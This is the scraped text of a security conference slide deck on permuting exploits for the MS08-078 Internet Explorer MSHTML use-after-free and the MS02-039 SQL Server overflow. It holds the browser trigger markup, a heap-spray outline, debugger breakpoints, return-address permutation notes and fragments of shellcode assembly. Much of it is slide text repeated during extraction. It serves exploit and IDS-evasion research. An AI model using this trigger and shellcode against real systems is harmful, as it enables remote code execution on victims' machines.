  • 71. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CCurrentRecordInstance::GetCurrentRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 72. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CXfer::CreateBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 73. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 74. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 75. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CRecordInstance::AddBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 76. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CImplPtrAry::Append DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 77. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 78. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::TransferToDestination DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 79. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 80. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::TransferFromSrc DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 81. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 82. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::RemoveBinding DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 83. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 _MemFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 84. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 HeapFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 85. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 RtlFreeHeap DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 86. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 RtlpLowFragHeapFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 87. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CImplAry::Delete DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 88. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::Detach DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 89. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 90. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::TransferFromSrc DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 91. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 92. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 93. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 94. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 95. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 96. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 97. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 98. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 99. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 100. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 101. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 102. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 103. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 104. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC DATAFLD Trigger0 a 0 a 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t 0a Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 105. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC Permutation 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t DATAFLD 0a0a0a Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 106. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATAFLD 0x0a0a0a0a Exploitation shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 107. MS08-078 Breakingpoints bp mshtml!CElement::GetAAdataFld bp mshtml!CElement::GetAAdataSrc bp mshtml!CCurrentRecordConsumer::Bind bp mshtml!CCurrentRecordInstance::GetCurrentRecordInstance bp mshtml!CXfer::CreateBinding bp mshtml!CXfer::TransferFromSrc bp mshtml!CXfer::Detach bp mshtml!CRecordInstance::CRecordInstance bp mshtml!CRecordInstance::AddBinding bp mshtml!CRecordInstance::TransfertoDestination bp mshtml!CRecordInstance::RemoveBinding bp mshtml!CRecordInstance::Detach bp mshtml!CRecordInstance::~CRecordInstance bp mshtml!CImplPtrAry::Append bp mshtml!CImplPtrAry::Delete bp _MemFree bp kernel32!HeapFree bp ntdll!RtlFreeHeap bp ntdll!RtlpLowFragHeapFree
  • 108. MS08-078 Breakingpoints bp mshtml!CElement::GetAAdataFld bp mshtml!CElement::GetAAdataSrc bp mshtml!CCurrentRecordConsumer::Bind bp mshtml!CCurrentRecordInstance::GetCurrentRecordInstance bp mshtml!CXfer::CreateBinding bp mshtml!CXfer::TransferFromSrc bp mshtml!CXfer::Detach bp mshtml!CRecordInstance::CRecordInstance bp mshtml!CRecordInstance::AddBinding bp mshtml!CRecordInstance::TransfertoDestination bp mshtml!CRecordInstance::RemoveBinding bp mshtml!CRecordInstance::Detach bp mshtml!CRecordInstance::~CRecordInstance bp mshtml!CImplPtrAry::Append bp mshtml!CImplPtrAry::Delete bp _MemFree bp kernel32!HeapFree bp ntdll!RtlFreeHeap bp ntdll!RtlpLowFragHeapFree
  • 110. Approach Unconditional Vulnerability Complete (YES) Incomplete (NO) Vulnerable Documentation? Document Alternatives? Ecosystem Reverse Reversing? Alternatives? Alternatives Engineer Obfuscation Exploitation Arbitrary code Alternatives Detection Attack detection Alternatives? Permutation OP
  • 111. MS02-039 POPed • SQL Request: • JUMP: – CLNT_UCAST_INST (0x04). – Unconditional JUMP short, relative, and forward to REL8. • SQL INSTANCENAME: – There are 115 possible values to REL8. – ASCII hexa values from 0x01 to 0xff, except: – 115 permutations. 0x0a, 0x0d, , 0x2f, 0x3a and 0x5c. – 24,000 permutations. • Writable address and memory alignment: – There are 26,758 new writable addresses within • Return address: SQLSORT.DLL (Microsoft SQL Server 2000 – Uses the “jump to register” technique, in this SP0/SP1/SP2). There are much more writable case the ESP register. addresses if do not mind making it hardcoded. – There are four (4) new possible return addresses – Tools: “IDA Pro 5.0 Freeware” by Hex-Rays, and within SQLSORT.DLL (Microsoft SQL Server “OlyDBG 2.01 alpha 2” by Oleh Yuschuk. 2000 SP0/SP1/SP2). There are much more return – 26,758 permutations. addresses if do not mind making it hardcoded. – Tools: “Findjmp.c” by Ryan Permeh, (“Hacking • Padding and memory alignment: Proof your Network – Second Edition”, 2002), – ASCII hexa values from 0x01 to 0xff. and “DumpOp.c” by Koskya Kortchinsky (“Macro – The length may vary, depending on JUMP, from reliability in Win32 Exploits” – Black Hat Europe, 3,048 to 29,210 possibilities. 2007). – 29,210 permutations. – 4 permutations.
  • 114. MS08-078 POPed • CVE-2008-4844: “…crafted XML document • Data Consumer (HTML elements): containing nested <SPAN> elements”? I do not – According to MSDN (“Binding HTML think so… Elements to Data”) there are, at least, fifteen (15) bindable HTML elements • XML Data Island: available, but only five (5) elements are – There are two (2) options: using the useful. Dynamic HTML (DHTML) <XML> element – The HTML element is a key trigger, because within the HTML document or overloading it points to a dereferenced XML DSO, but the HTML <SCRIPT> element. it does not have to be the same HTML – Unfortunately, the HTML <SCRIPT> element to do so – it can be any mixed element is useless. HTML element. – But there are three (03) new alternatives to – 25 permutations. embedded a DSO. – 4 permutations. • Return address: – Uses “Heap Spray” technique, in this case • XML Data Source Object (DSO): the XML DSO handles the return address, and can use “.NET DLL” technique by Mark – Characters like “<” and “&” are illegal in Dowd and Alexander Sotirov (“How to <XML> element. To avoid errors <XML> Impress Girls with Browser Memory element can be defined as CDATA Protection Bypasses” – Black Hat USA, (Unparsed Character Data). But the <XML> 2008). element can be also defined as “&lt;” instead of “<”. – There are, at least, four (4) new possible return addresses. – Both <IMG SRC= > and <IMAGE SRC= > elements are useful as a XML DSO. – 4 permutations. – 4 permutations.
  • 116. Shellcode Regular Hadoken (波動拳) shell: shell: push 0x00646D63 call shell_set_cmd mov ebx, esp db “CMD /k”, 0 push edi shell_set_cmd: push edi pop ebx push edi push edi xor esi, esi push edi push byte 18 push edi pop ecx xor esi, esi push byte 18 Code by Stephen Fewer (Harmony Security) and part pop ecx of Metasploit Framework. Ideas by sk (SCAN Associates Berhad), and published on Phrack Magazine (issue 62, file 7). Demonstrated on H2HC 6th Edition (2009).
  • 117. Shellcode Regular Hadoken (波動拳) shell: shell: push 0x00646D63 call shell_set_cmd mov ebx, esp db “CMD /k”, 0 push edi shell_set_cmd: push edi pop ebx push edi push edi xor esi, esi push edi push byte 18 push edi pop ecx xor esi, esi push byte 18 Code by Stephen Fewer (Harmony Security) and part pop ecx of Metasploit Framework. Ideas by sk (SCAN Associates Berhad), and published on Phrack Magazine (issue 62, file 7). Demonstrated on H2HC 6th Edition (2009).
  • 118. Shellcode Shoryuken (昇龍拳) FPU GetPC shell: fnstenv_getpc PROC call shell_set_cmd ; Could be fld1, fldl2t, fldl2e, db “CMD /k set DIRCMD=/b”, 0 ; fldz, fldlg2 or fldln2. shell_set_cmd: pop ebx fldpi push edi fnstenv [esp - 0Ch] push edi pop eax push edi add byte ptr [eax], 0Ah xor esi, esi assembly: push byte 18 pop ecx fnstenv_getpc ENDP Ideas by sk (SCAN Associates Berhad), and published Ideas by Aaron Adams, and published on VULN-DEV on Phrack Magazine (issue 62, file 7). (November 18th, 2003). Demonstrated on H2HC 6th Edition (2009). Demonstrated on H2HC 6th Edition (2009).
  • 119. Shellcode Shoryuken (昇龍拳) FPU GetPC shell: fnstenv_getpc PROC call shell_set_cmd ; Could be fld1, fldl2t, fldl2e, db “CMD /k set DIRCMD=/b”, 0 ; fldz, fldlg2 or fldln2. shell_set_cmd: pop ebx fldpi push edi fnstenv [esp - 0Ch] push edi pop eax push edi add byte ptr [eax], 0Ah xor esi, esi assembly: push byte 18 pop ecx fnstenv_getpc ENDP Ideas by sk (SCAN Associates Berhad), and published Ideas by Aaron Adams, and published on VULN-DEV on Phrack Magazine (issue 62, file 7). (November 18th, 2003). Demonstrated on H2HC 6th Edition (2009). Demonstrated on H2HC 6th Edition (2009).
  • 121. What demo? NO DEMONSTRATION But you can test by yourselves!!!
